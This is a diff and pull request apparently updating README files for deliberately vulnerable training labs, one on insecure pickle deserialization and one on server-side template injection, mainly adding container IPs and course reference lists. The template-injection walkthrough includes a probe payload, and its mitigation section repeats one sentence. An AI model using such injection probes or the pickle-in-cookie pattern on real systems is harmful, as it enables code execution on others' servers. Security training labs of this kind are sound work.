+- **Defending and Deploying AI (video)**  This course provides a comprehensive, hands-on journey into modern AI applications for technology and security professionals, covering AI-enabled programming, networking, and cybersecurity to help learners master AI tools for dynamic information retrieval, automation, and operational efficiency. [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+
+- **AI-Enabled Programming, Networking, and Cybersecurity**
+Learn to use AI for cybersecurity, networking, and programming tasks. [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+
+- **Securing Generative AI**
+Explore security for deploying and developing AI applications, RAG, agents, and other AI implementations. [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+
+- **Certified Ethical Hacker (CEH), Latest Edition** [Available on O'Reilly](https://learning.oreilly.com/course/certified-ethical-hacker/9780135395646/)
+
+## Additional Resources
+
+- **Hacking Scenarios (Labs) in O'Reilly**: [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository**: [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs**: [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)
+- **The Art of Hacking** - [Visit The Art of Hacking](https://theartofhacking.org)
+- **Hacking Scenarios (Labs) in O'Reilly** - [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository** - [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs** - [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)

--- a/additional-labs/deserial-gate/README.md
+++ b/additional-labs/deserial-gate/README.md
@@ -1,5 +1,7 @@
 # Deserial Gate (Insecure Deserialization)
 
+**Lab Name:** `deserial-gate`
+**Vulnerability:** Insecure Deserialization
 ## Objective
 The application uses Python's `pickle` module to serialize and deserialize user preferences in a cookie. Your goal is to exploit insecure deserialization to gain Remote Code Execution (RCE).
 
@@ -7,5 +9,27 @@ The application uses Python's `pickle` module to serialize and deserialize user 
 1. **Insecure Deserialization**: The application uses `pickle.loads` on untrusted user input from the `user_prefs` cookie.
 
 ## How to Run
-Access the lab at `http://<IP>:5022` or `http://localhost:5022`.
+This lab is part of the WebSploit Labs framework and it is running on the `deserial-gate` container on the `10.6.6.42` IP address.
+Access the lab at `http://10.6.6.42:5022`.
+
+## References
+For more information on insecure deserialization vulnerabilities and secure coding practices, check out these resources:
+
+- **Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics** - [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+- **The AI Revolution in Networking, Cybersecurity, and Emerging Technologies** - [Available on O'Reilly](https://learning.oreilly.com/library/view/the-ai-revolution/9780138293703)
+
+## Additional References
+
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+- **Build Your Own AI Lab (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/build-your-own/9780135439616)
+- **Defending and Deploying AI (video)** - [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+- **AI-Enabled Programming, Networking, and Cybersecurity** - [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+- **Securing Generative AI** - [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+- **The Art of Hacking** - [Visit The Art of Hacking](https://theartofhacking.org)
+- **Hacking Scenarios (Labs) in O'Reilly** - [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository** - [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs** - [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)
 

--- a/additional-labs/render-reign/README.md
+++ b/additional-labs/render-reign/README.md
@@ -1,5 +1,8 @@
 # Render Reign (Server-Side Template Injection)
 
+**Lab Name:** `render-reign`
+**Vulnerability:** Server-Side Template Injection
+
 ## Objective
 The application uses a template engine to render user input. Your goal is to exploit Server-Side Template Injection (SSTI) to gain Remote Code Execution (RCE).
 
@@ -7,5 +10,41 @@ The application uses a template engine to render user input. Your goal is to exp
 1. **SSTI**: The application directly concatenates user input into the template string.
 
 ## How to Run
-Access the lab at `http://<IP>:5021` or `http://localhost:5021`.
+This lab is part of the WebSploit Labs framework and it is running on the `render-reign` container on the `10.6.6.41` IP address.
+Access the lab at `http://10.6.6.41:5021`.
 
+## Walkthrough
+1. Access the lab at `http://10.6.6.41:5021`.
+2. Enter your name to generate a custom badge.
+3. Observe the template string: `Hello, %s!`.
+4. Try to inject a payload to execute arbitrary code.
+5. Payload: `{{7*7}}`
+6. The output should be `49`.
+
+    
+## Explanation
+The application is vulnerable to Server-Side Template Injection because it directly concatenates user input into the template string. This allows an attacker to inject arbitrary code into the template.
+
+## Mitigation
+The application should use a template engine that is secure against Server-Side Template Injection. The application should also use a template engine that is secure against Server-Side Template Injection.
+
+## References
+For more information on Server-Side Template Injection vulnerabilities and secure coding practices, check out these resources:
+
+- **Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics** - [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+- **The AI Revolution in Networking, Cybersecurity, and Emerging Technologies** - [Available on O'Reilly](https://learning.oreilly.com/library/view/the-ai-revolution/9780138293703)
+
+## Additional References
+
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+- **Build Your Own AI Lab (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/build-your-own/9780135439616)
+- **Defending and Deploying AI (video)** - [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+- **AI-Enabled Programming, Networking, and Cybersecurity** - [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+- **Securing Generative AI** - [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+- **The Art of Hacking** - [Visit The Art of Hacking](https://theartofhacking.org)
+- **Hacking Scenarios (Labs) in O'Reilly** - [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository** - [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs** - [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)


### PR DESCRIPTION
- Add lab names and container info to Command_Injection, GraphQL, Multi-Vulnerability-Gauntlet, Path_Traversal, deserial-gate, and render-reign READMEs
- Add references sections with O'Reilly resources and training links
- Update main README with git clone install instructions
- Add .cursor/ to .gitignore

This standardizes documentation across all labs with consistent container names, IPs, ports, and reference materials.

- Fixes #71 